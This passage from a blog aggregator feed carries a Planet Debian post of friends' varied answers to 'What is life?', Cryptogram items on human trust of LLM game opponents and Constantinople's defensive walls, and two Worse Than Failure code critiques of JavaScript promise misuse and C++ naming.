"Sadly," says he, "Not even gmail/chromium either."


"Updated software is available, but there are no updates!" he puzzled. "Clicking Install Now just throws that dialog right back in my face. I'm re-cursing." Zero, one, does it really make a difference?


"Questions" The Beast in Black "I do, in fact, have a question..."


One of the foundational guides to my [lyle, not bib] engineering career was Jon Bentley's Programming Pearls. These are not those.
"Veni, vidi: vc. No pearls of wisdom here, just litter," says The Beast.



,

Planet DebianSahil Dhiman: What is Life (to you)?

It started with a thought: to understand people’s perspectives on life and its meaning. So I texted folks, “What is life (to you)?”. Each of the following list items (-) is a response from a different individual, mostly verbatim.

- A lot

- Everyone has a few universal basic qualities, and some special qualities. To me life is pursuit of exploring world based on those qualities and maturing those qualities as one goes on about exploring world/life with those qualities.
Discovering and enhancing experiences as one goes through them.

- life is endless suffering

- my answer might change daily, but this is what I’ve noticed and feel recently. Life is a spectrum with two distinct ends: what we control and what we don’t. At birth, the spectrum is largely tilted toward control, but throughout our lives, it gradually shifts toward the other side. Ultimately, as we approach death, we lose all control over any aspect of our existence, reaching the other end of the spectrum.
tho this isn’t universal, privilege plays a huge part in what you control tho i believe it holds true for the majority
but yeah man, meaning and purpose are dynamic, it’s in their nature to change i can give you a different answer this evening itself xD

- Funeral Monologue from Synecdoche, New York. https://www.youtube.com/watch?v=Z9PzSNy3xj0

- Zindagi ek nadiya hai, Aur mujhe tairna nahi aata
(translation - Life is a river, and I don’t know how to swim)
On a more serious note, Life is what you make it out for yourself. The only established truth is that it will end. We can never know if there is something after or if there was something before. So try to live a life that you feel aspired by? But this question was beautifully answered by that book which you had about that dying professor
(Me - He was talking about Tuesday’s with Morrie)

- My answer is 42

- One, it’s living on your own terms, you define everything for yourself, success, normal, whatever. You get to curate your version of it no matter the societal norms.
It’s an accumulation of experiences - friends, parents, work, activities, doing shit loads. Sab try karo- travel, zumba, art, music, workout, sports, dil kara ye karna hai karlo. (translation - If your heart wants to do it, just do it.)
Then I think relationships - all that you’ve nurtured, people forget maintaining people because of work. It takes efforts to keep people in your life, everyone that comes has a place in yours, how well thats stays is upto you. You also get to curate your people, who stays who don’t. Family toh hai hi (translation - family is there) but everyone else that comes along can make it pretty good.
So I don’t want to be 50 and be like chalo ab kuch apne liye karte hai… (translation - Come on, now let’s do something for ourselves) Do whatever shit you want today. Not everything costs money, and if it does get thrifty
But do keep healthy while doing all of that

- Being alive so that my daughter can grow up and i can help raising her kids as well. Raising kids without mother is tough :P

- Definitively, I feel like Life is a by product of proteins and energy working together. But in a more personal sense, Life is a dumb joke played onto us. It’s a rat race. But rats exists because of life and then it becomes a chicken-egg problem
Honestly, I don’t give good answers to life questions. I’m generally the one asking
Life can be like a box of chocolates, you don’t know what you’re gonna get untill you experience the chocolate(assuming the chocolates are heterogenous and contains a mix of everything)
Camus once said, “Life is a revolt”, and one of his students added more spice to it like “Life is a revolt against the meaninglessness of existence"
I kinda feel like Life is the pursuit of every person’s search for meaning

- Imprisonment waiting for execution 😄
I have one more thought while we are on the topic , game with pre defined starting position and predefined destination , path to reach is a maze

- A phase where you can have a really good time or really bad one, usually the mix of both. A phase where you are prisoner to responsibility and materialistic wants.
It’s a hell for you, where you try to create heaven for others. Being born was never your choice, but ending is always in your hands but you are a prisoner. You fear that leaving this world behind will destroy the heavens you created for others and they will be back to hell. But eventually everyone moves on watching the hourglass of their life.
Once you are left with no desires or no one to create heavens for, you look arround yourself. You see everyone chasing something, everyone scared of their limitted life time sliping away yet you want it to end sooner.
Doesn’t matter if it was all good till now, or all bad. The other half is waiting for redemption. If it was all good, it’s best time to die don’t wait for the bad to start. If was all bad, it’s still the best time to die what if it was the good one and more worst is waiting for you. We desire to be remembered, yet we want to free from this loop of suffering.
Someone once said, life is a suffering, chose your sufferings.

- Life to me is to live without regrets and live with freedom.
Life is always unpredictable and this unpredictability makes it more interesting and worth it.

- As of now, for the state of mind that I am in , I think for me life is about subtle struggle, subtle inconveniences and yet moving forward cause that’s all I know.
I am not sure if any of this has any meaning, but sometimes I feel I was born of a purpose and that the universe has my back.
For me it’s about raising my consciousness, understanding people to their depths, gaining moderate material success and helping people to some extend.
I have tried to seek a grander meaning but I have failed.
Life for me is what I make out it.
In my times of great success i rarely think about life for I am busy enjoying it, whatever you may call that state of mind.

- For me its the little things that you enjoy with YOUR people

- Life to me is about living and loving, and doing it in a way that sustains. It’s the people who shape you, the work you get absorbed in, the quiet moments in between. There’s also the wanting, the drive to figure out what’s worth going after and how to get there, but that’s just one part of it, not the point of it. And none of it happens in a vacuum. I’m aware of the privileges that let me live this way, and I try to hold on to that gratitude. In the end, life has both a material and a non-material side, and a lot of what we do is chasing material things in an attempt to satisfy something non-material within us

- Mere liye (translation - for me) life is staying at my home and studying random economics papers. That’s when I enjoy myself the most.

- Very complicated
Some days I wish this life never ended and some time I feel it would be better if it stopped at that moment.
It all depends on the events that happen in the so called “life”.
So life to me is a string of events that happen anyway and you get to make some decisions which can turn it in any direction and then you wonder how did that happen.

- not forgetting to breathe, learn, eat, game, take a good shit, love, sleep.

- To be honest it changed with time! At 19 it was about freedom, wasn’t sure what freedom meant but i wanted that! To be free from everything, maybe because parents still controlled a part of my life. Then came 22-24 where i was working, trying to figure out what i want, the meaning changed from freedom to living for myself. To earn more, to be greedy about myself and pursue whatever would help me gain more steps in my career.
Came my mba life, switched my life from doing for myself to trying everything out to have no regrets. Life meaning was just about living with no regrets, invested, gambled, did everything to earn that tag of “yeah, have tried that”. Now it has all switched to, it was all just a fake facade. Life turned to having a meaningful life rather than finding meaning in what i am doing. Living for people around me, chhoti chhoti cheezo m khushi (translation - happiness in small things(?)) isn’t really a topic of conversation but more of happy thing for me. So it changed, and m quite happy to be honest. Life did show me a lot of failures, but was privileged enough to face those failures. Gained a lot of learnings if not money😂
Hopeful for more learnings and change meaning of life with time

- A task.

- You have different answers at different times You learn different meanings at different times When you are studying, basically it is about job, finding a partner then it becomes, house, car other things based on your income in between, there can be passion too
Free Software was a passion, electoral politics too, but both kind of faded and I want cooperative and user driven development now (prav - something that motivates me every day) and these days learning Chinese and watching Cdrama takes a huge part of my leisure time it is heavily subjective and also influences by previous experiences people around you, how much influence they have on you
it also depends on if they had to struggle in their life or not, for some life did not give much troubles and trouble itself can be relative people who never had to struggle may find even smallest challenges as troubles like if you own a car, your worry is finding a parking slot

- I am too young to think about lyfe

- A ticket to see the show on earth, I guess 😀
I guess life is different depending on the mood. It is a very broad question.
(Me - What is it in this present mood?)
Learning stuff (like I am learning a new language) and being happy but also to regulate emotions in a world where being optimistic is getting harder each day.
Life is also having a unique set of glasses you wear. Both in terms of looking from your eyeballs and your psychological perspective. Both are unique and cannot be replicated.
It is interesting what people on their deathbed think of life. If I know I am dying, my perspective would change a whole lot.
Life is finishing reading books while we are alive 😉
Life is sleeping after a good XMPP chat 😉

- Dukh dard peeda (translation - sorrow pain suffering)

- uhh to word it? life is just like a journey from A to somewhere and its all about what paths you take and what line you get on to me, just a series of short adventures that all connect to a larger sequence until you can’t have any more adventures-
(Me - eee, THE END. drop dead, like a coin)
yeaaaah- I am not really for spirituality of an afterlife, to me life just ends at some point, after which point there fails to remain a discernable you, and some X time after which, you will be last remembered, try to make that last time a good one I guess?
(Me - no soul?)
uhhh not in the way most people think of it i guess?
theres just a lot of yous, theres the physical you, there is the idea of you, there is the expectation of you, and one of the undefinable you I would label as the soul maybe? like the part thats not physically you, but also certainly you
(Me - can’t say I understood part, but I get you in this sense)
mhm- well its about just questioning who you are more so questioning what life is-, I have sadly spent way too much time trying to figure that out

- Making the best of the time you have

- living a full range of experiences and embracing the good ones, seeing all that the world has to offer. In the end we were always just stardust. Might as well enjoy it when we are stardust with a consciousness of our own.

- For some reason or the Universe’s /dev/random I was born here as a biological being, and from my experience I understood living is hard and the best way to live is by embracing it. Loving everyone and everything around you. Be happy and joyful until you naturally say good bye to this world.

- Life is being fucked by everything and you just have to figure out and try to stick to the things worth being fucked for

Note: The following was transcribed from an audio message.

- There are five conditions to become a life to survive in the environment. I think there’s five conditions by the biological definitions and reproduction is one of the factor virus is not considered a life form because it cannot reproduce on its own but technically it’s kind of a life because it reproduces using the DNA ability this is the biological definition. Do you want a philosophical definition?
My definition is kind of the same except that you get life experiences along with it as a human. Extra benefits is that you are not an NPC. All other organisms are NPCs. But humans can interpret the world and change it to their liking. That is life in the case of a human. But then many humans are mostly NPCs. But they still can change the life. Okay, fuck this. Where is this even going?
A human is an exception in the case of life, because human is not an NPC. Human can interrupt the world, human can change it to its liking, which is why we are such a successful organism on this planet. That is life to me. That’s a human. But all of this is kind of meaningless, because the biological impurity of a human being still exists, so you still have the urges to reproduce, which kind of makes it like just another organism. But then, humans are yet to evolve to overcome that biological imperative.

I’m grateful for all the replies, outlooks, and subsequent conversations I got to have after this question with everyone. After all, it was a deeply personal question. It does fit in nicely with my definition of life:
“Life is all about experiences and all the transient relationships one gets to have with folks we meet on the way.”

Cryptogram Human Trust of AI Agents

Interesting research: “Humans expect rationality and cooperation from LLM opponents in strategic games.”

Abstract: As Large Language Models (LLMs) integrate into our social and economic interactions, we need to deepen our understanding of how humans respond to LLMs opponents in strategic settings. We present the results of the first controlled monetarily-incentivised laboratory experiment looking at differences in human behaviour in a multi-player p-beauty contest against other humans and LLMs. We use a within-subject design in order to compare behaviour at the individual level. We show that, in this environment, human subjects choose significantly lower numbers when playing against LLMs than humans, which is mainly driven by the increased prevalence of ‘zero’ Nash-equilibrium choices. This shift is mainly driven by subjects with high strategic reasoning ability. Subjects who play the zero Nash-equilibrium choice motivate their strategy by appealing to perceived LLM’s reasoning ability and, unexpectedly, propensity towards cooperation. Our findings provide foundational insights into the multi-player human-LLM interaction in simultaneous choice games, uncover heterogeneities in both subjects’ behaviour and beliefs about LLM’s play when playing against them, and suggest important implications for mechanism design in mixed human-LLM systems.

Worse Than FailureCodeSOD: We'll Hire Better Contractors Next Time, We Promise

Nona writes: "this is the beginning of a 2100 line function."

That's bad. Nona didn't send us the entire JavaScript function, but sent us just the three early lines, which definitely raise concerns:

if (res.length > 0) {
  await (function () {
    return new Promise((resolve, reject) => {

We await a synchronous function which returns a promise, passing a function to the promise. As a general rule, you don't construct promises directly; you let asynchronous code generate them and pass them around (or await them). It's not a thing you never do, but it's certainly suspicious. It gets more problematic when Nona adds:

This function happens to contain multiple code repetition snippets, including these three lines.

That's right, this little block appears multiple times in the function, inside of an anonymous function getting passed to the Promise.

No, the code does not work in its current state. It's unclear what the 2100 line function was supposed to do. And yes, this was written by lowest-bidder third-party contractors.
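
For contrast, the legitimate reason to construct a Promise directly is to wrap a callback-style API, and even then you do it exactly once, in a small named helper that everything else simply awaits. Here's a minimal sketch of that pattern; the file-reading helper is purely illustrative and not taken from the submitted codebase.

const fs = require("fs");

// Wrap the callback-style API in a Promise once, in a named helper.
function readFilePromise(path) {
  return new Promise((resolve, reject) => {
    fs.readFile(path, "utf8", (err, data) => {
      if (err) reject(err);
      else resolve(data);
    });
  });
}

// Every caller just awaits the helper; no further `new Promise` needed,
// and certainly not one copy-pasted throughout a 2100 line function.
async function main() {
  const res = await readFilePromise("./input.txt");
  if (res.length > 0) {
    console.log(res);
  }
}

main().catch(console.error);

(And in modern Node you don't even need the helper: util.promisify or the fs/promises module will hand you the awaitable version directly.)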

Nona adds:

I am numb at this point and know I gotta fix it or we lose contracts

Management made the choice to "save money" by hiring third parties, and now Nona's team gets saddled with all the crunch to fix the problems created by the "savings".


365 TomorrowsWitch Moth

Author: A. R. Waking up to a blaring alarm while in a war is nothing out of the ordinary; for Atlas, it happens daily, or a couple of times a month. He would have never thought today would be any different. ​ Stationed on a planet controlled by the Terrestrian Coalition, Atlas was used to […]

The post Witch Moth appeared first on 365tomorrows.

,

Cryptogram Defense in Depth, Medieval Style

This article on the walls of Constantinople is fascinating.

The system comprised four defensive lines arranged in formidable layers:

  • The brick-lined ditch, divided by bulkheads and often flooded, 15-20 meters wide and up to 7 meters deep.
  • A low breastwork, about 2 meters high, enabling defenders to fire freely from behind.
  • The outer wall, 8 meters tall and 2.8 meters thick, with 82 projecting towers.
  • The main wall—a towering 12 meters high and 5 meters thick—with 96 massive towers offset from those of the outer wall for maximum coverage.

Behind the walls lay broad terraces: the parateichion, 18 meters wide, ideal for repelling enemies who crossed the moat, and the peribolos, 15–20 meters wide between the inner and outer walls. From the moat’s bottom to the highest tower top, the defences reached nearly 30 meters—a nearly unscalable barrier of stone and ingenuity.

Cryptogram Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.

Worse Than FailureCodeSOD: Three Letter Acronyms, Four Letter Words

Candice (previously) has another WTF to share for us.

We're going to start by just looking at one fragment of a class defined in this C++ code: TLAflaList.

Every type and variable has a three-letter-acronym buried in its name. The specific meanings of most of the acronyms are lost to time, so "TLA" is as good as any other three random letters. No one knows what "fla" is.

What drew Candice's attention was that there was a type called "list", which implies they're maybe not using the standard library and have reinvented a wheel. Another data point arguing in favor of that is that the class had a method called getNumElements, instead of something more conventional like size.

Let's look at that function:

size_t TLAflaList::getNumElements()
{
	return mv_FLAarray.size();
}

In addition to the meaningless three-letter-acronyms which start every type and variable, we're also adding on a lovely bit of hungarian notation, throwing mv_ on the front for a member variable. The variable is called "array", but is it? Let's look at that definition.

class TLAflaList
{
	…
	private:
		TLAflaArray_t mv_FLAarray;
		…
}

Okay, that gives me a lot more nonsense letters but I still have no idea what that variable is. Where's that type defined? The good news, it's in the same header.

typedef std::vector<INtabCRMprdinvusage_t*> TLAflaArray_t;

So it's not a list or an array, it's a vector. A vector of bare pointers, which definitely makes me worry about inevitable use-after-free errors or memory leaks. Who owns the memory that those pointers are referencing?
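
If the intended answer is "the list owns them", modern C++ can at least say so in the type. The following is only a sketch of the general technique with a stubbed-out record type, not a drop-in fix for this codebase:

#include <memory>
#include <vector>

// Stand-in for the real record type; fields elided.
struct INtabCRMprdinvusage_t {};

// Owning container: each record is freed automatically when the vector goes away.
using OwningRecordList = std::vector<std::unique_ptr<INtabCRMprdinvusage_t>>;

// Non-owning view: raw pointers are tolerable only when someone else owns the records.
using RecordView = std::vector<const INtabCRMprdinvusage_t*>;

int main() {
    OwningRecordList records;
    records.push_back(std::make_unique<INtabCRMprdinvusage_t>());
    return static_cast<int>(records.size()); // no manual delete anywhere
}

That does nothing about the naming, but at least the next reader would know who is responsible for the delete.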

"IN" in the type name is an old company, good ol' Initrode, which got acquired a decade ago. "tab" tells us that it's meant to be a database table. We can guess at the rest.

This isn't a codebase, it's a bad Scrabble hand. It's also a trainwreck. Confusing, disorganized, and all of that made worse by piles of typedefs that hide what you're actually doing and endless acronyms that make it impossible to read.

One last detail, which I'll let Candice explain:

I started scrolling down the class definition - it took longer than it should have, given that the company coding style is to double-space the overwhelming majority of lines. (Seriously; I've seen single character braces sandwiched by two lines of nothing.) On the upside, this was one of the classes with just one public block and one private block - some classes like to ping-pong back and forth a half-dozen times.
